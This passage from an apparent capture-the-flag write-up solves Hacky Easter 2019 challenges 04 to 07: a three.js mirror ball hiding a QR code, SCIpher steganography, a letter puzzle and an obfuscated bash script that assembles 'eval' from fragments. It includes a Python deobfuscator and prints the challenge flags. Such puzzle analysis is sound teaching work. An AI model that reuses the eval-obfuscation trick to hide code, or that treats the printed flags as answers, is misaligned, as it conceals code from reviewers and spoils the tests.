src=&quot;js\/three.js&quot;&gt;&lt;\/script&gt;\n  &lt;script src=&quot;js\/controls\/OrbitControls.js&quot;&gt;&lt;\/script&gt;\n  &lt;script src=&quot;js\/libs\/dat.gui.min.js&quot;&gt;&lt;\/script&gt;\n  &lt;script src=&quot;js\/mirrors.js&quot;&gt;&lt;\/script&gt;\n<\/pre><\/div>\n<br\/>This file defines an array, which obviously sets the position of each mirror tile:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\" title=\"\">\nvar mirrors = &#x5B;\n    &#x5B;-212.12311944947584, 229.43057454041843, 249.7306422149211],  &#x5B;360.6631259495831, 169.04730469627978, 
-36.67585520745629],  ...\n<\/pre><\/div>\n<br\/>When beginning to inspect the array within the web developer console, I was quite surprised that the array contains <code>1930<\/code> items, which are far more than I would have expected:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_03.png\" width=\"700\"\/>\n<br\/>\n<br\/>In order to be able to modify the javascript code, the page can be downloaded and run locally. Since the texture images are loaded dynamically through javascript and are not downloaded automatically by the browser, the following adjustment can be made to enable the textures on the local version:\n<br\/>\n<br\/><u>Before<\/u>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 79; title: ; notranslate\" title=\"\">\n        var r = &quot;textures\/cube\/Bridge2\/&quot;;\n<\/pre><\/div>\n<br\/><u>After<\/u>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 79; title: ; notranslate\" title=\"\">\n        var r = &quot;https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/challenges\/disco2\/textures\/cube\/Bridge2\/&quot;;\n<\/pre><\/div>\n<br\/>After this adjustment the textures are also working in the local version:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_04.png\" width=\"700\"\/>\n<br\/>\n<br\/>Now we can modify the javascript code in order to get an idea of where the egg might be hidden.\n<br\/>\n<br\/>One modification I tested was hiding the actual sphere of the mirror ball. 
In order to do this, it suffices to comment out the following line:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 131; title: ; notranslate\" title=\"\">\n        \/\/scene.add(sphereMesh);\n<\/pre><\/div>\n<br\/>After this change we can see that there are additional mirror tiles within the sphere:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_05.png\" width=\"500\"\/>\n<br\/>\n<br\/>By rotating the sphere around a little bit one can vaguely guess that it is actually a QR code hidden within the sphere.\n<br\/>\n<br\/>In order to get a clean view on it, the outer mirror tiles should be removed.\n<br\/>\n<br\/>Since the outer tiles should all have the same distance from the center, we can determine this distance and filter out all corresponding tiles. At first let&#8217;s display the distance of all tiles by entering the following javascript code in the web developer console:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\" title=\"\">\nmirrors.forEach(tile =&gt; {\n  var len = Math.sqrt(tile&#x5B;0]**2 + tile&#x5B;1]**2 + tile&#x5B;2]**2);\n  console.log(len);\n});\n<\/pre><\/div>\n<br\/>The printed values suggest that the distance of the outer tiles is approximately <code>400.0<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_06.png\" width=\"300\"\/>\n<br\/>\n<br\/>Knowing this we can adjust the javascript code in order to filter out these tiles:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; first-line: 138; highlight: [143,144]; title: ; notranslate\" title=\"\">\n        for (var i = 0; i &lt; mirrors.length; i++) {\n          var m = mirrors&#x5B;i];\n          mirrorTile = new THREE.Mesh(tileGeom, sphereMaterial);\n          mirrorTile.position.set(m&#x5B;0], m&#x5B;1], m&#x5B;2]);\n 
         mirrorTile.lookAt(center);\n          var len = Math.sqrt(m&#x5B;0]**2 + m&#x5B;1]**2 + m&#x5B;2]**2);\n          if (len &gt; 399.9 &amp;&amp; len &lt; 400.1) continue;\n          scene.add(mirrorTile);\n        }\n<\/pre><\/div>\n<br\/>Now a little bit less imagination is required to recognize the QR code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_07.png\" width=\"400\"\/>\n<br\/>\n<br\/>\n<br\/>Let&#8217;s add two more changes to make the QR code even more recognizable. At first we can change the texture of the mirror tiles to be simply black:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; first-line: 118; highlight: [120]; title: ; notranslate\" title=\"\">\n        sphereMaterial = new THREE.MeshLambertMaterial({\n          \/\/envMap : textureCube\n          color: 0x000000\n        });\n<\/pre><\/div>\n<br\/>Then we adjust the orientation of the mirror tiles to be aligned with the direction of the bridge by replacing the following line:\n<br\/>        <div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; first-line: 143; highlight: [144]; title: ; notranslate\" title=\"\">\n          \/\/mirrorTile.lookAt(center);\n          mirrorTile.lookAt(new THREE.Vector3(0, 0, 1000));\n<\/pre><\/div>\n<br\/>Now the QR code is clearly visible:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_08.png\" width=\"500\"\/>\n<br\/>\n<br\/>&#8230; and can even be scanned:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg04# zbarimg screen.png\nQR-Code:he19-r5pN-YIRp-2cyh-GWh8\nscanned 1 barcode symbols from 1 images in 0.1 seconds\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-r5pN-YIRp-2cyh-GWh8<\/span>.\n<br\/>\n<h1 
id=\"chlg05\">05 &#8211; Call for Papers<\/h1>\nThe challenge provides an <i>MS Word<\/i> file called <code>IAPLI_Conference.docx<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg05_01.png\" width=\"700\"\/>\n<br\/>\n<br\/>The text itself didn&#8217;t seem to contain any useful information. However, when viewing the properties of the file, I recognized something suspicious:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg05_02.png\" width=\"600\"\/>\n<br\/>\n<br\/>The file was <u>modified<\/u> by <code>Philipp Sieber<\/code>, who probably is the author of the challenge (<code>PS<\/code>). This comes as little surprise. However, the file was <u>created<\/u> by <code>SCIpher<\/code>. This doesn&#8217;t look like a usual username. Accordingly I googled for <code>SCIpher<\/code>, which led me to the following page: <a href=\"https:\/\/pdos.csail.mit.edu\/archive\/scigen\/scipher.html\" target=\"_new\" rel=\"noopener noreferrer\">https:\/\/pdos.csail.mit.edu\/archive\/scigen\/scipher.html<\/a>. As the page states, <i>&#8220;SCIpher is a program that can hide text messages within seemingly innocuous scientific conference advertisements&#8221;<\/i>. 
In order to extract the hidden text message, we can simply copy&#038;paste the text of the Word file into the following textarea and click on <code>Decode<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg05_03.png\" width=\"600\"\/>\n<br\/>\n<br\/>The hidden message is actually a link:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg05_04.png\" width=\"600\"\/>\n<br\/>\n<br\/>&#8230; which leads us to the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg05_05.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-A6kG-rb9U-Iury-qv93<\/span>.\n<br\/>\n<h1 id=\"chlg06\">06 &#8211; Dots<\/h1>\nThe challenge provides a sudoku-like field with letters:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg06_01.png\" width=\"400\"\/>\n<br\/>\n<br\/>&#8230; as well as another field containing dots:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg06_02.png\" width=\"400\"\/>\n<br\/>\n<br\/>\n<br\/>At first I thought that the dots in the second image indicate which letters in the first image are relevant. Since this didn&#8217;t lead to anything useful, I tried it the other way round: taking into account all letters which are <u>not<\/u> covered by a dot. When doing this, I noticed that each dot is in a different inner square and all squares are covered by a dot except the middle upper as well as the middle right one. So these must be the actual dots of the field located at the bottom right, which contains a painting of green and golden dots. 
Thus we got the following letters:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg06_03.png\" width=\"400\"\/>\n<br\/>\n<br\/>\n<br\/>The letters are: <code>CRCHSHTOEDIOLPWAASEWHITSTOE<\/code>\n<br\/>\n<br\/>The first word that is quite easy to recognize within these letters is <code>PASSWORD<\/code>.\n<br\/>\n<br\/>Extracting this word leaves the remaining letters: <code>CCHHTOEILAEWHITSTOE<\/code>.\n<br\/>\n<br\/>Mh, there might also be the word <code>THE<\/code> &#8230; remaining letters: <code>CCHOILAEWHITSTOE<\/code>.\n<br\/>\n<br\/>Probably also <code>IS<\/code> &#8230; remaining letters: <code>CCHOLAEWHITTOE<\/code>.\n<br\/>\n<br\/>The letters at the end look like the word <code>WHITE<\/code> &#8230; remaining letters: <code>CCHOLAETO<\/code>.\n<br\/>\n<br\/>And these letters can be rearranged into the last word, which is: <code>CHOCOLATE<\/code>.\n<br\/>\n<br\/>This makes the final text: <code>THE PASSWORD IS WHITE CHOCOLATE<\/code>.\n<br\/>\n<br\/>Entering the password <code>WHITECHOCOLATE<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg06_04.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-n3B2-lZTU-LQTJ-nlRC<\/span>.\n<br\/>\n<h1 id=\"chlg07\">07 &#8211; Shell we Argument<\/h1>\nThe challenge provides the following bash script:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nz=&quot;\n&quot;;ACz=&#039;he&#039;;CCz=&#039;ec&#039;;iHz=&#039;Gr&#039;;vEz=&#039;na&#039;;LBz=&#039;ye&#039;;OFz=&#039;aw&#039;;kDz=&#039; u&#039;;lEz=&#039;r&quot;&#039;;GBz=&#039;Pz&#039;;sDz=&#039;at&#039;;kEz=&#039;et&#039;;HCz=&#039; m&#039;;wEz=&#039;be&#039;;az=&#039;in&#039;;pCz=&#039; 
w&#039;;UGz=&#039;w=&#039;;qFz=&#039;-9&#039;;WFz=&#039;Ah&#039;;yz=&#039;ag&#039;;ABz=&#039;Lz&#039;;pGz=&#039; 4&#039;;wz=&#039;\/e&#039;;YHz=&#039;$a&#039;;JBz=&#039;8c&#039;;jFz=&#039;{&#039;;KDz=&#039; i&#039;;lFz=&#039;{1&#039;;Kz=&#039;8a&#039;;Wz=&#039;tp&#039;;EFz=&#039;pe&#039;;bDz=&#039;&quot; &#039;;FIz=&#039;py&#039;;sGz=&#039; 3&#039;;IDz=&#039;tw&#039;;PHz=&#039;$J&#039;;HDz=&#039; B&#039;;oz=&#039;f3&#039;;uGz=&#039; 9&#039;;lz=&#039;Tz&#039;;bz=&#039;Wz&#039;;IFz=&#039;y!&#039;;RCz=&#039;di&#039;;NEz=&#039;y &#039;;SFz=&#039;lt&#039;;qDz=&#039;t.&#039;;XCz=&#039; y&#039;;cHz=&#039;$i&#039;;JDz=&#039;: &#039;;xGz=&#039;00&#039;;IHz=&#039;t=&#039;;GDz=&#039;s.&#039;;ICz=&#039;e &#039;;iBz=&#039;oz&#039;;sz=&#039;ht&#039;;hGz=&#039; +&#039;;gFz=&#039;sN&#039;;ODz=&#039; \/&#039;;PDz=&#039;-&#x5B;&#039;;MDz=&#039;fo&#039;;uFz=&#039;$ &#039;;mz=&#039;es&#039;;vFz=&#039;]]&#039;;cGz=&#039;&#x5B; &#039;;WBz=&#039;nz&#039;;ZDz=&#039;d&quot;&#039;;WHz=&#039;$W&#039;;FHz=&#039;$m&#039;;uz=&#039;ck&#039;;lDz=&#039;nd&#039;;HEz=&#039;ot&#039;;rHz=&#039;2&#039;;KHz=&#039;$B&#039;;rBz=&#039; &#x5B;&#039;;dDz=&#039;-R&#039;;Rz=&#039;hz&#039;;jGz=&#039;))&#039;;wBz=&#039;1 &#039;;fBz=&#039;12&#039;;NHz=&#039;$F&#039;;PEz=&#039;yp&#039;;JCz=&#039;so&#039;;LGz=&#039;ce&#039;;jCz=&#039;on&#039;;CFz=&#039;gh&#039;;fFz=&#039;ti&#039;;nCz=&#039;cu&#039;;vz=&#039;Uz&#039;;jEz=&#039;do&#039;;dBz=&#039;ac&#039;; vHz=&#039;ro&#039;;JFz=&#039;$9&#039;;wHz=&#039;ws&#039;;TFz=&#039;qu&#039;;VCz=&#039;wi&#039;;jz=&#039;Iz&#039;;OEz=&#039;bo&#039;;yDz=&#039;t,&#039;;yGz=&#039;7&#039;;LHz=&#039;z$&#039;;fEz=&#039; k&#039;;pHz=&#039;sl&#039;;ADz=&#039;er&#039;;mHz=&#039;om&#039;;nFz=&#039;=~&#039;;WGz=&#039;tc&#039;;oHz=&#039;o!&#039;;sHz=&#039; x&#039;;NCz=&#039;um&#039;;cBz=&#039;cz&#039;;Iz=&#039;.p&#039;;EDz=&#039;gu&#039;;lBz=&#039;42&#039;;SCz=&#039;sc&#039;;BDz=&#039; o&#039;;SGz=&#039;e?&#039;;qHz=&#039;p 
&#039;;qGz=&#039;65&#039;;VHz=&#039;$U&#039;;oBz=&#039;dz&#039;;IEz=&#039;ai&#039;;ECz=&#039; &quot;&#039;;eCz=&#039;-n&#039;;Vz=&#039;Bz&#039;;tCz=&#039;wh&#039;;fDz=&#039;y,&#039;;uDz=&#039; e&#039;;rz=&#039;Az&#039;;VFz=&#039;ub&#039;;YFz=&#039;h,&#039;;HBz=&#039;m\/&#039;;LFz=&#039;No&#039;;vCz=&#039;iv&#039;;fz=&#039;Yz&#039;;bCz=&#039; -&#039;;LIz=&#039;w,&#039;;OGz=&#039;0 &#039;;GFz=&#039;ea&#039;;dGz=&#039;2 &#039;;iz=&#039;r.&#039;;kFz=&#039;&#x5B;&#x5B;&#039;;tFz=&#039;3}&#039;;ZFz=&#039; f&#039;;HHz=&#039; 5&#039;;LDz=&#039;n &#039;;MFz=&#039;n&#039;\\&#039;&#039;&#039;;BIz=&#039;Fi&#039;;QHz=&#039;$L&#039;;kBz=&#039;mz&#039;;mDz=&#039;st&#039;;Pz=&#039;Xz&#039;;hFz=&#039;r(&#039;;JGz=&#039;se&#039;;oFz=&#039; ^&#039;;CEz=&#039;$3&#039;;iDz=&#039; I&#039;;CHz=&#039;de&#039;;MCz=&#039;rg&#039;;MBz=&#039;Dz&#039;;dHz=&#039;$k&#039;;NGz=&#039;ee&#039;;hz=&#039;Jz&#039;;pBz=&#039;b7&#039;;KGz=&#039;Ni&#039;;mEz=&#039;$7&#039;;JEz=&#039;n.&#039;;QEz=&#039;of&#039;;uCz=&#039; g&#039;;AIz=&#039;$t&#039;;WDz=&#039;re&#039;;XGz=&#039;h=&#039;;tDz=&#039;r &#039;;NBz=&#039;\/\/&#039;;KFz=&#039;-t&#039;;xEz=&#039;, &#039;;DHz=&#039;v\/&#039;;gBz=&#039;bz&#039;;BGz=&#039;Nr&#039;;XBz=&#039;c7&#039;;cFz=&#039;t&#039;\\&#039;&#039;&#039;;IGz=&#039;el&#039;;FBz=&#039;gg&#039;;NDz=&#039;rm&#039;;LEz=&#039;al&#039;;tEz=&#039;. 
&#039;;Dz=&#039;Cz&#039;;ZBz=&#039;r\/&#039;;XFz=&#039;hh&#039;;YBz=&#039;Qz&#039;;uBz=&#039;-l&#039;;REz=&#039;t&quot;&#039;;oDz=&#039;d &#039;;HIz=&#039;l &#039;;sBz=&#039; $&#039;;PGz=&#039;99&#039;;gGz=&#039;ow&#039;;HGz=&#039;.&quot;&#039;;yHz=&#039;w-&#039;;Yz=&#039;62&#039;;AGz=&#039;&amp; &#039;;hDz=&#039;ut&#039;;yCz=&#039;mb&#039;;pz=&#039;kz&#039;;FDz=&#039;nt&#039;;iEz=&#039;ca&#039;;DDz=&#039;ar&#039;;hBz=&#039;75&#039;;vBz=&#039;t &#039;;Jz=&#039;fz&#039;;IBz=&#039;pz&#039;;rGz=&#039;$4&#039;;CDz=&#039;f &#039;;bGz=&#039; {&#039;;hEz=&#039;w &#039;;Tz=&#039;Rz&#039;;rDz=&#039; r&#039;;ZGz=&#039;=0&#039;;SEz=&#039;$5&#039;;QDz=&#039;a-&#039;;MEz=&#039; v&#039;;eEz=&#039;?.&#039;;vGz=&#039;11&#039;;tHz=&#039;-w&#039;;ZHz=&#039;$c&#039;;gDz=&#039; b&#039;;VEz=&#039;m &#039;;TEz=&#039;-b&#039;;OIz=&#039;h:&#039;;Cz=&#039;&quot;;&#039;;NFz=&#039;ge&#039;;EEz=&#039;Oh&#039;;UHz=&#039;$S&#039;;KIz=&#039;w:&#039;;qBz=&#039;if&#039;;wCz=&#039;rr&#039;;Az=&#039;z=&#039;;qCz=&#039;h &#039;;pDz=&#039;ur&#039;;nBz=&#039;6e&#039;;DGz=&#039;&amp;&amp;&#039;;Ax2=&#039;ev&#039;;RDz=&#039;zA&#039;;cDz=&#039;!=&#039;;QBz=&#039;Hz&#039;;xTT=&#039;al&#039;;DBz=&#039;ha&#039;;QFz=&#039;e!&#039;;aEz=&#039; s&#039;;DIz=&#039; h&#039;;RHz=&#039;$N&#039;;MHz=&#039;$D&#039;;aGz=&#039;()&#039;;jHz=&#039;rf&#039;;MIz=&#039;ed&#039;;GGz=&#039;${&#039;;oGz=&#039;ch&#039;;BCz=&#039;n&#039;;YDz=&#039;ep&#039;;vDz=&#039;ri&#039;;Fz=&#039;s:&#039;;AEz=&#039;sn&#039;;qEz=&#039;ma&#039;;xFz=&#039;$2&#039;;nEz=&#039;-I&#039;;CBz=&#039;Ez&#039;;GEz=&#039;o,&#039;;mGz=&#039;((&#039;;GCz=&#039;ve&#039;;Mz=&#039;e9&#039;;JHz=&#039;&quot;$&#039;;nGz=&#039;(m&#039;;OBz=&#039;iz&#039;;IIz=&#039;nv&#039;;QGz=&#039;9,&#039;;dEz=&#039;ra&#039;;GHz=&#039;eq&#039;;rFz=&#039;]{&#039;;aBz=&#039;ez&#039;;kz=&#039;te&#039;;rCz=&#039;yo&#039;;xz=&#039;Sz&#039;;yFz=&#039; 
&amp;&#039;;CIz=&#039;eg&#039;;UFz=&#039;ir&#039;;hHz=&#039;z&quot;&#039;;DFz=&#039;ty&#039;;xDz=&#039;em&#039;;DCz=&#039;ho&#039;;xHz=&#039;x-&#039;;nz=&#039;Zz&#039;;FGz=&#039;8 &#039;;lGz=&#039;=$&#039;;CGz=&#039;4 &#039;;Sz=&#039;7e&#039;;kGz=&#039;gt&#039;;uEz=&#039;If&#039;;AHz=&#039; (&#039;;TGz=&#039;lo&#039;;WEz=&#039;cl&#039;;OCz=&#039;en&#039;;pFz=&#039;&#x5B;0&#039;;iCz=&#039;I &#039;;TDz=&#039;] &#039;;ZEz=&#039;hy&#039;;FFz=&#039;s,&#039;;KBz=&#039;Gz&#039;;qz=&#039;15&#039;;nDz=&#039;an&#039;;OHz=&#039;$H&#039;;Gz=&#039;&#039;\\&#039;&#039;;&#039;;BFz=&#039;g &#039;;bEz=&#039;uc&#039;;QCz=&#039;o &#039;;aFz=&#039;! &#039;;Oz=&#039;co&#039;;UDz=&#039;..&#039;;YCz=&#039;ou&#039;;eHz=&#039;$o&#039;;RBz=&#039;as&#039;;BBz=&#039;g-&#039;;PBz=&#039;cd&#039;;tBz=&#039;# &#039;;pEz=&#039;ay&#039;;EGz=&#039;$6&#039;;EBz=&#039;Vz&#039;;Uz=&#039;im&#039;;AFz=&#039;br&#039;;XEz=&#039;ue&#039;;SDz=&#039;-Z&#039;;gCz=&#039; ]&#039;;kCz=&#039;ly&#039;;nHz=&#039;gl&#039;;dCz=&#039;fi&#039;;VDz=&#039;.\/&#039;;gz=&#039;1e&#039;;BHz=&#039;&amp;&gt;&#039;;Ez=&#039;=&#039;\\&#039;&#039;&#039;;gHz=&#039;$r&#039;;ZCz=&#039;ex&#039;;yEz=&#039;ul&#039;;lHz=&#039;ok&#039;;DEz=&#039;-a&#039;;Zz=&#039;Kz&#039;;WCz=&#039;th&#039;;HFz=&#039;ll&#039;;RFz=&#039;&#039;\\&#039;&#039;s&#039;;UCz=&#039;s &#039;;FCz=&#039;Gi&#039;;KEz=&#039;3 &#039;;dz=&#039;rz&#039;;SBz=&#039;Mz&#039;;aDz=&#039;$1&#039;;bBz=&#039;d8&#039;;wFz=&#039;}&#039;;bFz=&#039;Le&#039;;cz=&#039;s\/&#039;;fHz=&#039;$p&#039;;fCz=&#039;10&#039;;aCz=&#039;it&#039;;KCz=&#039;me&#039;; eBz=&#039;gz&#039;;GIz=&#039;il&#039;;sCz=&#039;u &#039;;eDz=&#039;So&#039;;RGz=&#039; p&#039;;yBz=&#039; t&#039;;fGz=&#039;(l&#039;;Xz=&#039;lz&#039;;TBz=&#039;la&#039;;mFz=&#039;} &#039;;VBz=&#039;b.&#039;;YGz=&#039;hi&#039;;EIz=&#039;ap&#039;;XDz=&#039;cc&#039;;LCz=&#039; a&#039;;oCz=&#039;ss&#039;;oEz=&#039;lw&#039;;mBz=&#039;jz&#039;;wDz=&#039;c 
&#039;;jBz=&#039;4a&#039;;eFz=&#039;nc&#039;;rEz=&#039;ke&#039;;Qz=&#039;a6&#039;;Nz=&#039;Oz&#039;;PCz=&#039;ts&#039;;xCz=&#039;nu&#039;;Bz=&#039;&quot;&#039;;dFz=&#039;fu&#039;;xBz=&#039;];&#039;;jDz=&#039;&#039;\\&#039;&#039;t&#039;;wGz=&#039;$8&#039;;uHz=&#039;ww&#039;;bHz=&#039;$g&#039;;eGz=&#039;$(&#039;;iFz=&#039;) &#039;;YEz=&#039;le&#039;;Hz=&#039;qz&#039;;gEz=&#039;no&#039;;ez=&#039;ng&#039;;kHz=&#039;to&#039;;JIz=&#039;bl&#039;;FEz=&#039; n&#039;;tz=&#039;Fz&#039;;BEz=&#039;t?&#039;;VGz=&#039;0&#039;;UBz=&#039;Nz&#039;;NIz=&#039;ig&#039;;TCz=&#039;us&#039;;lCz=&#039; d&#039;;PFz=&#039;9 &#039;;EHz=&#039; ;&#039;;cCz=&#039;1&#039;;SHz=&#039;$P&#039;;THz=&#039;$Q&#039;;hCz=&#039;; &#039;;sFz=&#039;1,&#039;;Lz=&#039;az&#039;;tGz=&#039;33&#039;;aHz=&#039;$e&#039;;cEz=&#039;a &#039;;MGz=&#039;bu&#039;;sEz=&#039;ad&#039;;iGz=&#039; 1&#039;;UEz=&#039;I&#039;\\&#039;&#039;&#039;;XHz=&#039;$Y&#039;;mCz=&#039;is&#039;;\n$Ax2$xTT &quot;$Az$Bz$z$Cz$Dz$Ez$Fz$Gz$Hz$Ez$Iz$Gz$Jz$Ez$Kz$Gz$Lz$Ez$Mz$Gz$Nz$Ez$Oz$Gz$Pz$Ez$Qz$Gz$Rz$Ez$Sz$Gz$Tz$Ez ...\n<\/pre><\/div>\n<br\/>The first part of the script defines plenty of variables, which are used in the last line of the script. This line begins with <code>$Ax2$xTT<\/code>, which evaluates to <code>eval<\/code> considering the former variable definitions (<code>Ax2='ev'<\/code> and <code>xTT='al'<\/code>). This <code>eval<\/code> instruction is followed by a statement, which is composed of the formerly defined variables. 
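The statement that eval receives can also be reconstructed without running the script at all, which is the safer default whenever the script is untrusted. As an added example that is not part of the original writeup, the Python helper below parses the NAME='value' preamble (including the newline held in z and the '\'' quoting idiom), applies one pass of $NAME substitution to the final line and returns the command word together with the string that command would have been handed. SAMPLE is a constructed miniature in the same style, not the challenge script; the real one only differs in size:

```python
import re

# Constructed miniature in the style of the challenge script (not the real
# one): a bag of short variables, one of which (z) holds a newline, then one
# line that spells  eval "<payload>"  out of them.
SAMPLE = (
    "z=\"\n\";Ax2='ev';xTT='al';Az='ec';Bz='ho';Cz=' \"';Dz='he';Ez='llo';"
    "Fz='\"';Gz='n'\\''';\n"
    "$Ax2$xTT \"$Az$Bz$Cz$Dz$Ez$Fz$z$Az$Bz$Cz$Gz$Fz\"\n"
)

NAME_EQ = re.compile(r"[A-Za-z_][A-Za-z0-9_]*=")
VAR_REF = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")


def parse_assignments(text):
    """Read the leading NAME=value assignments of a shell script without running it.

    Supports the quoting the obfuscator uses: single quotes (literal), double
    quotes (may span lines, as z= does), the  '\\''  idiom for a literal single
    quote, and unquoted backslash escapes.  Returns (variables, remainder),
    where remainder starts at the first statement that is not an assignment.
    """
    env, i, n = {}, 0, len(text)
    while i < n:
        if text[i] in " \t\n;":           # separators between statements
            i += 1
            continue
        m = NAME_EQ.match(text, i)
        if not m:
            break
        name, i, parts = m.group(0)[:-1], m.end(), []
        while i < n and text[i] not in " \t\n;":
            c = text[i]
            if c == "'":                  # 'literal'
                j = text.index("'", i + 1)
                parts.append(text[i + 1:j])
                i = j + 1
            elif c == '"':                # "...": only \" and \\ are escapes here
                j = i + 1
                while text[j] != '"':
                    if text[j] == "\\" and text[j + 1] in '"\\':
                        j += 1
                    parts.append(text[j])
                    j += 1
                i = j + 1
            elif c == "\\":               # \x outside quotes
                parts.append(text[i + 1])
                i += 2
            else:
                parts.append(c)
                i += 1
        env[name] = "".join(parts)
    return env, text[i:]


def expand(s, env):
    """One pass of $NAME / ${NAME} substitution, as bash does before calling eval."""
    return VAR_REF.sub(lambda m: env.get(m.group(1), m.group(0)), s)


def deobfuscate(script):
    """Return (command, payload) for a script shaped like  VARS...  $a$b "$c$d...".

    command is what the first word expands to (eval here); payload is the
    expanded content of the double-quoted argument, i.e. the code that eval
    would have executed.
    """
    env, rest = parse_assignments(script)
    m = re.match(r'\s*(\S+)\s+"(.*)"\s*$', rest, re.S)
    if not m:
        raise ValueError('final line is not of the form  $cmd "..."')
    return expand(m.group(1), env), expand(m.group(2), env)


if __name__ == "__main__":
    command, payload = deobfuscate(SAMPLE)
    print(command)
    print(payload)
```

Because only one substitution pass is made, any $ signs stored inside the variables stay literal, exactly as bash treats them inside single quotes, so the returned payload is the second-stage script itself; it can be read directly or handed to parse_assignments again to resolve its own variable table.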
In order to quickly understand, what is passed to <code>eval<\/code>, we can simply replace <code>$Ax2$xTT<\/code> with <code>echo<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\necho &quot;$Az$Bz$z$Cz$Dz$Ez$Fz$Gz$Hz$Ez ...\n<\/pre><\/div>\n<br\/>Running the script outputs the following:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg07# bash eggi_02.sh\nz=&quot;\n&quot;;Cz=&#039;s:&#039;;qz=&#039;.p&#039;;fz=&#039;8a&#039;;az=&#039;e9&#039;;Oz=&#039;co&#039;;Xz=&#039;a6&#039;;hz=&#039;7e&#039;;Rz=&#039;im&#039;;Bz=&#039;tp&#039;;lz=&#039;62&#039;;Kz=&#039;in&#039;;Wz=&#039;s\/&#039;;rz=&#039;ng&#039;;Yz=&#039;1e&#039;;Jz=&#039;r.&#039;;Iz=&#039;te&#039;; Tz=&#039;es&#039;;Zz=&#039;f3&#039;;kz=&#039;15&#039;;Az=&#039;ht&#039;;Fz=&#039;ck&#039;;Uz=&#039;\/e&#039;;Sz=&#039;ag&#039;;Lz=&#039;g-&#039;;Ez=&#039;ha&#039;;Vz=&#039;gg&#039;;Pz=&#039;m\/&#039;;pz=&#039;8c&#039;;Gz=&#039;ye&#039;;Dz=&#039;\/\/&#039;;iz=&#039;cd&#039;;Hz=&#039;as&#039;;Mz=&#039;la&#039;; Nz=&#039;b.&#039;;nz=&#039;c7&#039;;Qz=&#039;r\/&#039;;ez=&#039;d8&#039;;cz=&#039;ac&#039;;gz=&#039;12&#039;;bz=&#039;75&#039;;oz=&#039;4a&#039;;mz=&#039;42&#039;;jz=&#039;6e&#039;;dz=&#039;b7&#039;;\nif &#x5B; $# -lt 1 ]; then\necho &quot;Give me some arguments to discuss with you&quot;\nexit -1\nfi\nif &#x5B; $# -ne 10 ]; then\necho &quot;I only discuss with you when you give the correct number of arguments. Btw: only arguments in the form \/-&#x5B;a-zA-Z] ...\/ are accepted&quot;\nexit -1\nfi\nif &#x5B; &quot;$1&quot; != &quot;-R&quot; ]; then\necho &quot;Sorry, but I don&#039;t understand your argument. $1 is rather an esoteric statement, isn&#039;t it?&quot;\nexit -1\nfi\nif &#x5B; &quot;$3&quot; != &quot;-a&quot; ]; then\necho &quot;Oh no, not that again. 
